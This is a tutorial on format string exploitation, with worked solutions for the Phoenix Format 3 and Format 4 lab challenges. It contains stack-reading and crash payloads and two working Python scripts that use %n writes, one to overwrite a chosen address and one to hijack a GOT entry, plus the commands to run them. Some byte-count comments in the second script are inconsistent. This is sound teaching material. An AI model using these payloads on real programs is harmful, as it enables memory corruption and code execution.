Format String Exploits

Theory

Format string vulnerabilities happen when user input goes here:

printf(USER_INPUT, A, B);

And not here:

printf("string: %s", USER_INPUT);

Reading from the stack

You can specify more format strings than there are parameters to the printf, thereby reading more from the stack than what is expected:

printf("%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x");
-> will print the next 20 items on the stack

Accessing the n-th element

An attacker can even directly access the n-th argument on the stack by using a special case format specifier:

printf("%10$x"); 
-> will print the tenth element next on the stack

Note: this is not always enabled, and does not always work! In that case, you can still just specify enough %x’s to get to where you want.

Reading arbitrary data

When %s is used as the format specifier, the function will treat the data on the stack as an address to go fetch a string from. This means that the attacker can potentially make %s read from any address, even if the data is not located on the stack.

printf("\xef\xbe\xad\xde%x%x%x%s", A, B, C);

For example, the above will cause printf() to print the string located at address 0xdeadbeef.

Writing to an address

%n will cause the number of characters written so far to be stored into the corresponding function argument. For example, the following code will store the integer 5 into the variable num_char:

int num_char; 
printf("11111%n", &num_char);

With dummy output characters and width-controlling format specifiers, the attacker can now write arbitrary integers to the location pointed to by the function argument.

For example, %10d will pad the value to 10 characters.

int num_char;
printf("%10d%n", 0, &num_char); 
-> will print "          0", num_char is 10

And by using length modifiers, attackers are able to control the amount of data written with fine-grain control.

printf("%10d%n", 0, &num_char); -> writes 4 bytes to &num_char
printf("%10d%hn", 0, &num_char); -> writes 2 bytes to &num_char

Btw, if you just want to crash the application, then this should create a segmentation fault:

printf ("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s");

Writing arbitrary values to arbitrary addresses

If you want to write a 32 bit integer to an address, then the maximum amount of padding you will need is 2,147,483,647. That’s too much, so you should instead write 1 or 2 bytes at a time. The below Phoenix Format 3 example will write 1 bytes at a time, but keep in mind that writing 2 bytes at a time with width-controlling format specifiers is safer, since your writes won’t overflow into unintended addresses.

We can just start writing from the least significant byte (byte with the lowest address, aka byte at the end of a string, due to little endianness) and then just keep overwriting the higher bytes. One byte at a time.

Phoenix Format 3 exploitation

Note 1: We will be overwriting values past the changeme variable. Hope it doesn't break anything.

Note 2: You can put the address before the %p's. It will make the payload significantly shorter.

I made a script for getting the correct output.

#!/usr/bin/python3

address1 = "\x08\x04\x98\x44"[::-1]
address2 = "\x08\x04\x98\x45"[::-1]
address3 = "\x08\x04\x98\x46"[::-1]
address4 = "\x08\x04\x98\x47"[::-1]

buf = ''
buf += address1
buf += 'AAAA' # Add space for extra padding using %1234p or whatever
buf += address2
buf += 'BBBB' # Add space for extra padding
buf += address3
buf += 'CCCC' # Add space for extra padding
buf += address4

buf += '%p ' * 10 # Get to the start of the buffer

buf += '%219p ' # Add extra bytes to %n. It will overflow to 0x45.
buf += '%n '  # Write the first byte - 0x45
buf += '%49p '
buf += '%n ' # Write the second byte - 0x78
buf += '%203p '
buf += '%n ' # Write the third byte - 0x45
buf += '%29p '
buf += '%n ' # Write the fourth byte - 0x64

print(buf)

Exploit with:

python ~/format/format3/exploit.py | ./format-three

Phoenix Format 3 explanation

The goal of this challenge is to write the value 0x64457845 to the address 0x08049844.

The first things in the payload are the 4 addresses we want to write to (1 address for each byte), separated by some padding.

Then, enough format strings are added to get to the start of the payload on the stack. In this case, 11 %p’s are needed. So we first write 10 %p’s and then %219p. The %219p is necessary because it adds enough padding that the number of characters written so far is 0x45. 0x45 is the last byte of the value 0x64457845, which we needed to write.

Then, since the next value on the stack is the correct address, and we have the correct amount of written characters, we can add a %n to write 0x45 to 0x08049844. It might also write some stuff to 0x08049845, depending on the number of characters written so far, but we will overwrite it later anyways, so it doesn’t really matter.

Then, we will write %49p to write enough characters that the amount of written characters ends with 0x78, and write that value to the next address using %n. The next address was written to be 0x08049845, 1 byte higher than previously.

Then, %203p will overflow the last byte of the amount of written characters back to 0x45. We write it using %n.

And after repeating the step again to write the last byte to the last address, we will have written the desired value to the desired address!

We have also written 3 bytes to the 3 bytes next to the address, but hopefully that won’t break anything.

Arbitrary code execution

It should be possible to use the format string exploit to overwrite the saved function return address just like we did in the stack smashing section.

However, instead, we will be overwriting the Global Offset Table to gain code execution. This is based on Phoenix format 4.

Analysing the GOT flow

The program looks something like this:

printf(user_input);
exit(0);

Looking at it in radare, this is what the call to the exit function looks like:

0x080484fe b    e82dfeffff     call sym.imp.exit   ; void exit(int status);

If we step into that call, the execution goes to this line:

0x08048330      ff25e4970408   jmp dword [reloc.exit_228]  ; "C......." @ 0x80497e4

Which will jump to the address specified at the address reloc.exit_228

pf x @reloc.exit_228
0x080497e4 = 0xf7f7f543

And indeed, stepping once further, we end up at the address 0xf7f7f543.

So if we could change the value at the address 0x080497e4 to some other address (in the phoenix challenge, to 0x08048503) , then the execution flow will jump to that other address.

Solution

Changing the code from “writing arbitrary values to arbitrary addresses” slightly, I arrived at the following solution:

#!/usr/bin/python3

import sys

address1 = b"\x08\x04\x97\xe4"[::-1] 
address2 = b"\x08\x04\x97\xe5"[::-1] 
address3 = b"\x08\x04\x97\xe6"[::-1] 
address4 = b"\x08\x04\x97\xe7"[::-1] 

buf = b''
buf += address1
buf += b'AAAA' # Add space for extra padding using %1234p or whatever
buf += address2
buf += b'BBBB' # Add space for extra padding 
buf += address3
buf += b'CCCC' # Add space for extra padding
buf += address4

# Value we want to write: 0x08048503
buf += b'%p ' * 10 # Get to the start of the buffer
buf += b'%153p ' # Add extra bytes to %n. It will go to 0x103. 
buf += b'%n '  # Write the first byte - 0x03. The first 0x1 in the 0x103 will be overwritten later and 0x03 will stay.
buf += b'%128p ' # Add extra bytes to %n. It will go to 0x185.
buf += b'%n '  # Write the second byte - 0x85
buf += b'%125p ' # Add extra bytes to %n. It will go to 0x204.
buf += b'%n '  # Write the third byte - 0x04
buf += b'%258p ' # Add extra bytes to %n. It will go to 0x208.
buf += b'%n '  # Write the third byte - 0x04

with open('/home/user/input.txt', 'wb') as f:
  f.write(buf)

Exploit with:

python3 ~/format/format4/exploit.py; cat ~/input.txt | ./format-four

Last updated